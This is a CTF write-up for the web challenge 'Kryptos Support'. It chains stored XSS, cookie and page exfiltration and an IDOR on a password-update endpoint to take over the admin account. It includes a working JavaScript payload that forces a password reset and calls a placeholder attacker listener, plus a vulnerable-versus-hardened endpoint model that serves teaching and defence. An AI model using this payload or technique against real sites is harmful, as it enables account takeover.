Cyber Apocalypse 2022 — Kryptos Support
This challenge was in the “Web” category of the Cyber Apocalypse CTF and has the following description:
The landing page shows an input box for reporting an issue:
The web app also has a login function. A report form whose contents are presumably read by a member of staff is a classic stored XSS target, so that is what I tried to exploit first.
I started an HTTP server on port 8000 and used ngrok to make it reachable from the Internet.
Then I created a payload to retrieve the cookie:
Next I created a payload to retrieve the contents of the page the victim is looking at:
I received both the cookie and the page contents:
The cookie was a JWT. Its payload is only base64url-encoded, not encrypted, so I could decode it with a JWT decoder without knowing the signing key:
It showed that the username is “moderator”. However, I was not able to use that cookie to log in as the moderator, so I had to find another way in.
The HTML source of the page showed that there is a settings page at /settings.
Tampering with the settings page
Now I created a third payload to retrieve the settings page, base64 encoded so that quotes, ampersands and newlines in the HTML survive the trip through a URL:
The payload sends the base64 string to my web server in a GET parameter called “settings”. After waiting a bit, I received the content:
The decoded HTML:
As you can see, it contains a form to reset the password. There is also a settings.js file at /static/js/settings.js, which could be requested without authentication:
It POSTs JSON containing the new password and a uid to the endpoint /api/users/update. So I reimplemented the same call in my XSS payload to reset the moderator's password to “Password123”. Because the request is made by the moderator's own browser, it carries the moderator's session automatically; the stolen cookie is not needed for this step:
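As an added example (not the write-up's payload), this is what the forced reset looks like when issued from inside the XSS context. The page does not state the JSON field names or the moderator's uid; "uid", "password" and the uid value below are assumptions to be replaced with what /static/js/settings.js and the settings page actually use, and the listener URL is again a placeholder.

```javascript
// Added example (not the write-up's payload): the forced password reset,
// issued from inside the XSS context. Because the victim's browser makes the
// request, it carries the moderator's session cookie automatically; the
// stolen JWT is not needed.
// ASSUMPTIONS not stated on the page: the JSON field names "uid" and "password"
// and the moderator's uid must be read from /static/js/settings.js and the
// settings page; the values below are placeholders.
const UPDATE_ENDPOINT = "/api/users/update";
const ATTACKER = "https://attacker.example.ngrok.io"; // placeholder listener
const MODERATOR_UID = 2;                               // placeholder, read from the target

// Build the same request settings.js sends, so it can be inspected or replayed.
function buildUpdateRequest(uid, password) {
  return {
    url: UPDATE_ENDPOINT,
    options: {
      method: "POST",
      credentials: "include", // attach the victim's session cookie
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ uid, password }),
    },
  };
}

// Send the reset and report the HTTP status to the listener so the attacker
// knows when the new credentials are live.
async function resetPassword(uid, password, callbackBase) {
  const { url, options } = buildUpdateRequest(uid, password);
  const resp = await fetch(url, options);
  const note = encodeURIComponent(`${uid}:${resp.status}`);
  await fetch(`${callbackBase}/?reset=${note}`, { mode: "no-cors" });
  return resp.status;
}

if (typeof document !== "undefined") {
  // Browser context: fires when the moderator's browser renders the report.
  resetPassword(MODERATOR_UID, "Password123", ATTACKER);
}
```

The payload is delivered through the issue-report form and runs only when the moderator's browser renders the report, which is why the write-up had to wait for the callback before trying the new credentials.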
After the callback reached my web server, I logged in with the credentials moderator:Password123:
Unfortunately this was not enough to get the flag, so I navigated to the settings page and intercepted a password reset request:
As you can see, the request also contains the uid, which the client supplies and the server evidently trusts without checking that it matches the logged-in user. I sent the request to Burp Repeater to test other uids. uid 0 was not successful, but with uid 1 I was able to reset the admin's password and then log in with admin:Password123 to retrieve the flag:
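The final step is an insecure direct object reference: the endpoint authenticates the caller but never checks that the uid being updated belongs to that caller. The page does not show the challenge's server code, so the following is an added model of the endpoint, not the original, with the vulnerable handler beside a hardened one. It is framework-free so it runs under plain Node; the user table and passwords are constructed sample data.

```javascript
// Added example, not the challenge's server code (which the write-up does not
// show): a minimal model of /api/users/update that reproduces the IDOR the
// write-up exploited, next to a hardened handler. Framework-free so it runs
// under plain Node; a real app would bind these as Express route handlers.
// The user table and passwords are constructed sample data, stored in plain
// text only to keep the example short (real code stores a password hash).

function sampleUsers() {
  return new Map([
    [1, { username: "admin", password: "correct horse battery" }],
    [2, { username: "moderator", password: "old-mod-pass" }],
  ]);
}

// VULNERABLE: the target account is whatever uid the client puts in the JSON
// body. Authentication is checked, authorization is not, so any logged-in user
// (or an XSS running as one) can overwrite any other user's password.
function updatePasswordVulnerable(req, users) {
  if (!req.session) return { status: 401 };
  const { uid, password } = req.body;
  const user = users.get(Number(uid));
  if (!user) return { status: 404 };
  user.password = password;
  return { status: 200 };
}

// HARDENED: the target is always the caller's own account, taken from the
// server-side session; a uid in the body is ignored. Requiring the current
// password additionally stops a session-riding XSS (or a stolen cookie) from
// changing the password, because the attacker does not know it.
function updatePasswordHardened(req, users) {
  if (!req.session) return { status: 401 };
  const user = users.get(req.session.uid);
  if (!user) return { status: 401 };
  const { currentPassword, password } = req.body;
  if (typeof password !== "string" || password.length < 8) return { status: 400 };
  if (currentPassword !== user.password) return { status: 403 };
  user.password = password;
  return { status: 200 };
}

// Replay of the write-up's Repeater step: logged in as moderator (uid 2),
// ask the endpoint to reset uid 1.
function demo() {
  const attack = { session: { uid: 2 }, body: { uid: 1, password: "Password123" } };
  const vulnerable = sampleUsers();
  const hardened = sampleUsers();
  return {
    vulnerableStatus: updatePasswordVulnerable(attack, vulnerable).status,
    vulnerableAdminPassword: vulnerable.get(1).password,   // becomes "Password123"
    hardenedStatus: updatePasswordHardened(attack, hardened).status,
    hardenedAdminPassword: hardened.get(1).password,       // unchanged
  };
}
```

The fix is deliberately not "validate the uid": the right model is that a password-change endpoint has no uid parameter at all, and the account it acts on is derived from the session. Probing uids sequentially, as the write-up did, is also worth remembering as a test: low integers such as 1 almost always belong to the first-created administrative account.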